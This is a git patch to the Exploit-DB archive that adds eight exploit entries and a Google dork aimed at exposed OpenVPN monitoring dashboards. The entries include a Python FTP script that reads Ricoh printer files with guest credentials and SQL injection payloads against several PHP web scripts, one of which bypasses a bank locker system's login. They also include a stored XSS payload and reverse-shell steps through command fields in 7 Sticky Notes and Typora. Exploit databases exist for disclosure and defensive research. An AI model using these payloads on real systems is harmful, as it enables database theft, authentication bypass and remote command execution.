From a5920da7aff185378118221654434790efbca949 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Tue, 30 Jan 2024 00:16:26 +0000 Subject: [PATCH] DB: 2024-01-30 10 changes to exploits/shellcodes/ghdb Ricoh Printer - Directory and File Exposure Blood Bank & Donor Management System using v2.2 - Stored XSS Equipment Rental Script-1.0 - SQLi Bank Locker Management System - SQL Injection Fundraising Script 1.0 - SQLi PHP Shopping Cart 4.2 - Multiple-SQLi 7 Sticky Notes v1.9 - OS Command Injection Typora v1.7.4 - OS Command Injection --- exploits/hardware/remote/51755.py | 52 +++++++++++++++++++++++++++++++ exploits/php/remote/51749.TXT | 32 +++++++++++++++++++ exploits/php/remote/51750.TXT | 17 ++++++++++ exploits/php/webapps/51751.TXT | 29 +++++++++++++++++ exploits/php/webapps/51753.TXT | 29 +++++++++++++++++ exploits/php/webapps/51754.TXT | 45 ++++++++++++++++++++++++++ exploits/windows/local/51748.TXT | 22 +++++++++++++ exploits/windows/local/51752.TXT | 18 +++++++++++ files_exploits.csv | 8 +++++ ghdb.xml | 18 +++++++++++ 10 files changed, 270 insertions(+) create mode 100755 exploits/hardware/remote/51755.py create mode 100644 exploits/php/remote/51749.TXT create mode 100644 exploits/php/remote/51750.TXT create mode 100644 exploits/php/webapps/51751.TXT create mode 100644 exploits/php/webapps/51753.TXT create mode 100644 exploits/php/webapps/51754.TXT create mode 100644 exploits/windows/local/51748.TXT create mode 100644 exploits/windows/local/51752.TXT diff --git a/exploits/hardware/remote/51755.py b/exploits/hardware/remote/51755.py new file mode 100755 index 000000000..5007ca1f9 --- /dev/null +++ b/exploits/hardware/remote/51755.py @@ -0,0 +1,52 @@ +#Exploit Title: Ricoh Printer Directory and File Exposure +#Date: 9/15/2023 +#Exploit Author: Thomas Heverin (Heverin Hacker) +#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers +#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py +#Version: Ricoh Printers - All Versions +#Tested on: Windows +#CVE: N/A + +#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log) + +from ftplib import FTP + +def ftp_connect(ip): + try: + ftp = FTP(ip) + ftp.login("guest", "guest") + print(f"Connected to {ip} over FTP as 'guest'") + return ftp + except Exception as e: + print(f"Failed to connect to {ip} over FTP: {e}") + return None + +if __name__ == "__main__": + target_ip = input("Enter the Ricoh Printer IP address: ") + + ftp_connection = ftp_connect(target_ip) + if ftp_connection: + try: + while True: + file_list = ftp_connection.nlst() + print("List of Ricoh printer files and directories:") + for index, item in enumerate(file_list, start=1): + print(f"{index}. {item}") + + file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1 + if file_index < 0: + break + + if 0 <= file_index < len(file_list): + selected_file = file_list[file_index] + lines = [] + ftp_connection.retrlines("RETR " + selected_file, lines.append) + print(f"Contents of '{selected_file}':") + for line in lines: + print(line) + else: + print("Invalid file index.") + except Exception as e: + print(f"Failed to perform operation: {e}") + finally: + ftp_connection.quit() \ No newline at end of file diff --git a/exploits/php/remote/51749.TXT b/exploits/php/remote/51749.TXT new file mode 100644 index 000000000..30587b531 --- /dev/null +++ b/exploits/php/remote/51749.TXT @@ -0,0 +1,32 @@ +## Title: Equipment Rental Script-1.0 - SQLi +## Author: nu11secur1ty +## Date: 09/12/2023 +## Vendor: https://www.phpjabbers.com/ +## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The package_id parameter appears to be vulnerable to SQL injection +attacks. The payload ' was submitted in the package_id parameter, and +a database error message was returned. You should review the contents +of the error message, and the application's handling of other input, +to confirm whether a vulnerability is present. The attacker can steal +all information from the database! + +[+]Payload: +mysql + +Parameter: #1* ((custom) POST) + Type: error-based + Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) + Payload: package_id=(-4488))) OR 1 GROUP BY +CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0 +END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING +MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00 + +## Reproduce: +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0 + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +home page: https://www.nu11secur1ty.com/ \ No newline at end of file diff --git a/exploits/php/remote/51750.TXT b/exploits/php/remote/51750.TXT new file mode 100644 index 000000000..689b5eb7a --- /dev/null +++ b/exploits/php/remote/51750.TXT @@ -0,0 +1,17 @@ +# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS +# Application: Blood Donor Management System +# Version: v2.2 +# Bugs: Stored XSS +# Technology: PHP +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/ +# Date: 12.09.2023 +# Author: SoSPiro +# Tested on: Windows + +#POC +======================================== +1. Login to admin account +2. Go to /admin/update-contactinfo.php +3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//\x3csVg/\x3e" payload. +4. Go to http://bbdms.local/inedx.php page and XSS will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/51751.TXT b/exploits/php/webapps/51751.TXT new file mode 100644 index 000000000..ebb82dca8 --- /dev/null +++ b/exploits/php/webapps/51751.TXT @@ -0,0 +1,29 @@ +# Exploit Title: Bank Locker Management System - SQL Injection +# Application: Bank Locker Management System +# Date: 12.09.2023 +# Bugs: SQL Injection +# Exploit Author: SoSPiro +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/ +# Tested on: Windows 10 64 bit Wampserver + +## Description: +This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application. + +## Vulnerability Details: +- **Application Name**: Bank Locker Management System +- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/) +- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/) + +## Vulnerability Description: +The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields: + +Payload: admin' or '1'='1-- - + +An attacker can gain unauthorized access to the application with administrative privileges. + +## Proof of Concept (PoC): +1. Visit the application locally at http://blms.local (assuming it's hosted on localhost). +2. Navigate to the "banker" directory: http://blms.local/banker/ +3. In the login and password fields, input the following payload: +4. admin' or '1'='1-- - \ No newline at end of file diff --git a/exploits/php/webapps/51753.TXT b/exploits/php/webapps/51753.TXT new file mode 100644 index 000000000..ff961ed18 --- /dev/null +++ b/exploits/php/webapps/51753.TXT @@ -0,0 +1,29 @@ +## Title: Fundraising Script-1.0 SQLi +## Author: nu11secur1ty +## Date: 09/13/2023 +## Vendor: https://www.phpjabbers.com/ +## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The `cid` parameter appears to be vulnerable to SQL injection attacks. +The payload ' was submitted in the cid parameter, and a database error +message was returned. +The database is empty, but if it is not, this will be over for the +money of the donors and their bank accounts! +The attacker can steal all information from the database! + +[+]Payload: +mysql + +Parameter: cid (GET) + Type: error-based + Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) + Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT +(ELT(1741=1741,1))),0x7162787171),3873)) + +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0 + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51754.TXT b/exploits/php/webapps/51754.TXT new file mode 100644 index 000000000..5f6be6d57 --- /dev/null +++ b/exploits/php/webapps/51754.TXT @@ -0,0 +1,45 @@ +## Title: PHP Shopping Cart-4.2 Multiple-SQLi +## Author: nu11secur1ty +## Date: 09/13/2023 +## Vendor: https://www.phpjabbers.com/ +## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The `id` parameter appears to be vulnerable to SQL injection attacks. +A single quote was submitted in the id parameter, and a database error +message was returned. Two single quotes were then submitted and the +error message disappeared. The attacker easily can steal all +information from the database of this web application! +WARNING! All of you: Be careful what you buy! This will be your responsibility! + +[+]Payload: +mysql + +Parameter: id (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT +3795=3795-- sRcp&session_id= + + Type: error-based + Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (GTID_SUBSET) + Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND +GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT +(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND +(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id= + +## Reproduce: +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2 + +## Proof and Exploit: +https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +nu11secur1ty \ No newline at end of file diff --git a/exploits/windows/local/51748.TXT b/exploits/windows/local/51748.TXT new file mode 100644 index 000000000..917cf3df3 --- /dev/null +++ b/exploits/windows/local/51748.TXT @@ -0,0 +1,22 @@ +# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection +# Discovered by: Ahmet Ümit BAYRAM +# Discovered Date: 12.09.2023 +# Vendor Homepage: http://www.7stickynotes.com +# Software Link: +http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe +# Tested Version: 1.9 (latest) +# Tested on: Windows 2019 Server 64bit + +# # # Steps to Reproduce # # # + +# Open the program. +# Click on "New Note". +# Navigate to the "Alarms" tab. +# Click on either of the two buttons. +# From the "For" field, select "1" and "seconds" (to obtain the shell +within 1 second). +# From the "Action" dropdown, select "command". +# In the activated box, enter the reverse shell command and click the "Set" +button to set the alarm. +# Finally, click on the checkmark to save the alarm. +# Reverse shell obtained! \ No newline at end of file diff --git a/exploits/windows/local/51752.TXT b/exploits/windows/local/51752.TXT new file mode 100644 index 000000000..8c7aa5909 --- /dev/null +++ b/exploits/windows/local/51752.TXT @@ -0,0 +1,18 @@ +# Exploit Title: Typora v1.7.4 - OS Command Injection +# Discovered by: Ahmet Ümit BAYRAM +# Discovered Date: 13.09.2023 +# Vendor Homepage: http://www.typora.io +# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe +# Tested Version: v1.7.4 (latest) +# Tested on: Windows 2019 Server 64bit + +# # # Steps to Reproduce # # # + +# Open the application +# Click on Preferences from the File menu +# Select PDF from the Export tab +# Check the “run command” at the bottom right and enter your reverse shell +command into the opened box +# Close the page and go back to the File menu +# Then select PDF from the Export tab and click Save +# Reverse shell is ready! \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6a1abca69..ac6dce0d0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3860,6 +3860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,remote,hardware,,2011-12-30,2011-12-30,0,OSVDB-78282;CVE-2011-5053,,reaver-1.1.tar.gz,,, 34802,exploits/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",remote,hardware,,2010-10-04,2014-09-28,1,,,,,,https://www.securityfocus.com/bid/43685/info 51642,exploits/hardware/remote/51642.py,"ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)",2023-08-04,"Riyan Firmansyah of Seclab",remote,hardware,,2023-08-04,2023-08-04,0,,,,,, +51755,exploits/hardware/remote/51755.py,"Ricoh Printer - Directory and File Exposure",2024-01-29,"Thomas Heverin",remote,hardware,,2024-01-29,2024-01-29,0,,,,,, 9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022,2009-10-07,2016-10-29,1,CVE-2009-3710;OSVDB-58858,,,,, 8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware,,2009-03-22,,1,OSVDB-56342;OSVDB-56341;OSVDB-56340;OSVDB-56339,,2009-Louhi_CMC-brute_090323.zip,,,http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,, @@ -12887,6 +12888,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80,2016-03-01,2016-03-01,1,CVE-2016-2555,"Metasploit Framework (MSF)",,,http://www.exploit-db.comATutor-2.2.1.tar.gz, 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,,2019-08-13,2019-08-13,0,,Malware,,,, 47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80,2019-08-08,2019-08-08,0,,"Metasploit Framework (MSF)",,,, +51750,exploits/php/remote/51750.TXT,"Blood Bank & Donor Management System using v2.2 - Stored XSS",2024-01-29,SoSPiro,remote,php,,2024-01-29,2024-01-29,0,,,,,, 47699,exploits/php/remote/47699.rb,"Bludit - Directory Traversal Image File Upload (Metasploit)",2019-11-20,Metasploit,remote,php,,2019-11-20,2019-11-20,1,CVE-2019-16113,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/bludit_upload_images_exec.rb 45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,,2018-11-06,2018-11-06,1,CVE-2018-9206,"Metasploit Framework (MSF)",,,http://www.exploit-db.comjQuery-File-Upload-9.22.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a32d8083f023c1445f411b74b8f85de5754cd3a0/modules/exploits/unix/webapp/jquery_file_upload.rb 45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,,2018-11-06,2018-11-06,1,CVE-2018-9206,Remote,,,http://www.exploit-db.comjQuery-File-Upload-9.22.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a32d8083f023c1445f411b74b8f85de5754cd3a0/modules/exploits/unix/webapp/jquery_file_upload.rb @@ -12908,6 +12910,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,,2018-08-20,2018-08-21,1,CVE-2018-15576,Remote,,,,https://srcincite.io/pocs/cve-2018-15576.php.txt 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Metasploit Framework (MSF)",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb +51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,, 24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,, 40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php,,2016-09-27,2016-09-27,0,,"Metasploit Framework (MSF)",,,, 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,,2019-05-20,2019-05-20,1,CVE-2019-11231,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb @@ -14528,6 +14531,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51378,exploits/php/webapps/51378.txt,"Bang Resto v1.0 - 'Multiple' SQL Injection",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-28,1,CVE-2023-29849,,,,, 51377,exploits/php/webapps/51377.txt,"Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-28,1,CVE-2023-29848,,,,, 51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,, +51751,exploits/php/webapps/51751.TXT,"Bank Locker Management System - SQL Injection",2024-01-29,SoSPiro,webapps,php,,2024-01-29,2024-01-29,0,,,,,, 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip, 17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,, 9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",webapps,php,,2009-08-06,,1,CVE-2009-5003;OSVDB-68191,,,,, @@ -18873,6 +18877,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2621,exploits/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusions",2006-10-23,020,webapps,php,,2006-10-22,2016-09-14,1,OSVDB-30035;CVE-2006-5526,,,,http://www.exploit-db.comFM2021-4-40.tar.gz, 29869,exploits/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",webapps,php,,2007-04-19,2013-11-28,1,CVE-2007-2257;OSVDB-35419,,,,,https://www.securityfocus.com/bid/23565/info 3998,exploits/php/webapps/3998.php,"Fundanemt 2.2.0 - 'spellcheck.php' Remote Code Execution",2007-05-27,Kacper,webapps,php,,2007-05-26,,1,OSVDB-36657;CVE-2007-2935,,,,, +51753,exploits/php/webapps/51753.TXT,"Fundraising Script 1.0 - SQLi",2024-01-29,nu11secur1ty,webapps,php,,2024-01-29,2024-01-29,0,,,,,, 37500,exploits/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,webapps,php,,2012-06-17,2015-07-06,1,,,,,,https://www.securityfocus.com/bid/54402/info 27275,exploits/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,webapps,php,,2013-08-02,2013-08-02,0,OSVDB-95946,,,,http://www.exploit-db.comfg_download.zip, 8493,exploits/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,webapps,php,,2009-04-19,,1,OSVDB-54165;CVE-2009-1489;OSVDB-54164;CVE-2009-1488;OSVDB-54163;CVE-2009-1487,,,,, @@ -26175,6 +26180,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38572,exploits/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,webapps,php,,2015-10-30,2015-10-30,0,,,,,http://www.exploit-db.comphpservermon-3.1.1.zip,http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt 45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80,2018-12-03,2018-12-03,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comphpservermon-3.3.1.tar.gz, 12861,exploits/php/webapps/12861.txt,"PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion",2010-06-03,eidelweiss,webapps,php,,2010-06-02,,0,,,,,, +51754,exploits/php/webapps/51754.TXT,"PHP Shopping Cart 4.2 - Multiple-SQLi",2024-01-29,nu11secur1ty,webapps,php,,2024-01-29,2024-01-29,0,,,,,, 2119,exploits/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,webapps,php,,2006-08-06,,1,OSVDB-27805;CVE-2006-4052;OSVDB-27804;OSVDB-27803;OSVDB-27802;OSVDB-27801;OSVDB-27800,,,,,http://advisories.echo.or.id/adv/adv44-matdhule-2006.txt 5842,exploits/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,webapps,php,,2008-06-16,,1,OSVDB-46792;CVE-2008-2865,,,,, 8604,exploits/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",webapps,php,,2009-05-03,,1,OSVDB-54203;CVE-2009-1587,,,,, @@ -39256,6 +39262,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",2021-11-05,"Brian Rodriguez",local,windows,,2021-11-05,2021-11-05,0,,,,,, 50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",2021-11-02,ro0k,local,windows,,2021-11-02,2021-11-02,0,,,,,, 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,,2020-04-01,2020-04-01,0,,,,,, +51748,exploits/windows/local/51748.TXT,"7 Sticky Notes v1.9 - OS Command Injection",2024-01-29,"Ahmet Ümit BAYRAM",local,windows,,2024-01-29,2024-01-29,0,,,,,, 17647,exploits/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",local,windows,,2011-08-10,2012-11-15,1,,,,http://www.exploit-db.com/screenshots/idlt18000/screen-shot-2012-11-15-at-74224-am.png,http://www.exploit-db.coma-pdf-atmc.exe, 15033,exploits/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,local,windows,,2010-09-17,2010-09-17,1,OSVDB-68132,,,http://www.exploit-db.com/screenshots/idlt15500/15033.png,http://www.exploit-db.coma-pdf-atmc.exe, 16009,exploits/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Local Buffer Overflow",2011-01-18,h1ch4m,local,windows,,2011-01-18,2011-01-18,1,,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-01-18-at-82452-am.png,http://www.exploit-db.coma-pdf-atmc.exe, @@ -41613,6 +41620,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17967,exploits/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,local,windows,,2011-10-11,2016-10-27,1,CVE-2008-4779;OSVDB-49371,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt18000/17967.png,, 47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,,2019-06-20,2019-06-20,0,,,,,http://www.exploit-db.comtuneclone_setup.exe, 12293,exploits/windows/local/12293.py,"TweakFS 1.0 FSX Edition - Stack Buffer Overflow",2010-04-19,corelanc0d3r,local,windows,,2010-04-18,2011-01-03,1,OSVDB-63899;CVE-2010-1458,,,http://www.exploit-db.com/screenshots/idlt12500/screen-shot-2011-01-03-at-84220-pm.png,http://www.exploit-db.comtweakfs_zip_fsx.zip,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026 +51752,exploits/windows/local/51752.TXT,"Typora v1.7.4 - OS Command Injection",2024-01-29,"Ahmet Ümit BAYRAM",local,windows,,2024-01-29,2024-01-29,0,,,,,, 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,,2017-12-26,2017-12-26,0,CVE-2016-6914,,,,, 33961,exploits/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Privilege Escalation",2014-07-03,LiquidWorm,local,windows,,2014-07-04,2014-07-09,1,OSVDB-108726;CVE-2014-5453,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-09-at-91305-am.png,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5191.php 36189,exploits/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Privilege Escalation",2015-02-26,LiquidWorm,local,windows,,2015-02-27,2015-02-27,0,OSVDB-118804,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php diff --git a/ghdb.xml b/ghdb.xml index 50e24ed84..b58aeab7d 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -116843,6 +116843,24 @@ Linkedin: https://www.linkedin.com/in/hemantsolo/ 2006-04-25 anonymous + + 8399 + https://www.exploit-db.com/ghdb/8399 + Vulnerable Servers + intitle:"OpenVpn Status Monitor" + # Exploit Title: Anonymous Access to OpenVpn Monitoring Dashbaord +# Google Dork: intitle:"OpenVpn Status Monitor" +# Date: 27 Jan 2024 +# Exploit Author: Sabean Technology +# Vendor Homepage: https://github.com/furlongm/openvpn-monitor + +Demewoz Agegnehu | Sabean Technology | https://sabtechx.com + intitle:"OpenVpn Status Monitor" + https://www.google.com/search?q=intitle:"OpenVpn Status Monitor" + + 2024-01-29 + Sabean Technology + 118 https://www.exploit-db.com/ghdb/118